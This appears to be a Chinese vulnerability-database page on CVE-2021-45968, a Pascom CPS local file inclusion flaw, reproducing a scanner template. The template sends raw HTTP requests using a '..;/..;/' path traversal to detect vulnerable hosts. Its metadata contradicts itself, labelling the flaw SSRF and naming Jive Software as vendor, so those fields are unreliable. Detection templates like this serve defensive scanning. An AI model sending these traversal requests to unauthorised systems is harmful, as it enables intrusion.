CVE-2021-45968: Pascom CPS - Local File Inclusion

日期: 2025-08-01 | 影响软件: Pascom CPS | POC: 已公开

漏洞描述

Pascom packaged with Cloud Phone System (CPS) versions before 7.20 contain a known local file inclusion vulnerability.

PoC代码[已公开]

id: CVE-2021-45968

info:
  name: Pascom CPS  - Local File Inclusion
  author: dwisiswant0
  severity: high
  description: |
    Pascom packaged with Cloud Phone System (CPS) versions before 7.20 contain a known local file inclusion vulnerability.
  impact: |
    The vulnerability can be exploited by an attacker to gain unauthorized access to sensitive information, execute arbitrary code, or perform other malicious activities.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the Local File Inclusion vulnerability in Pascom CPS.
  reference:
    - https://kerbit.io/research/read/blog/4
    - https://www.pascom.net/doc/en/release-notes/
    - https://tutorialboy24.blogspot.com/2022/03/the-story-of-3-bugs-that-lead-to.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-45968
    - https://jivesoftware.com/platform/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-45968
    cwe-id: CWE-918
    epss-score: 0.70707
    epss-percentile: 0.98653
    cpe: cpe:2.3:a:jivesoftware:jive:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: jivesoftware
    product: jive
  tags: cve2021,cve,pascom,lfi,jivesoftware

http:
  - raw:
      - |
        GET /services/pluginscript/ HTTP/1.1
        Host: {{Hostname}}
        GET /services/pluginscript/..;/..;/ HTTP/1.1
        Host: {{Hostname}}
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code_2 != status_code_1"
        condition: and
# digest: 4a0a0047304502207606fe75c46e95fcc42d648e5f9f0334a68617efe8648105eeca8173ca471826022100eebafae618b926ff471c3a5bab20a9200fd7080c1bbe598e032fb49763d37405:922c64590222798bb761d5b6d8e72950

相关漏洞推荐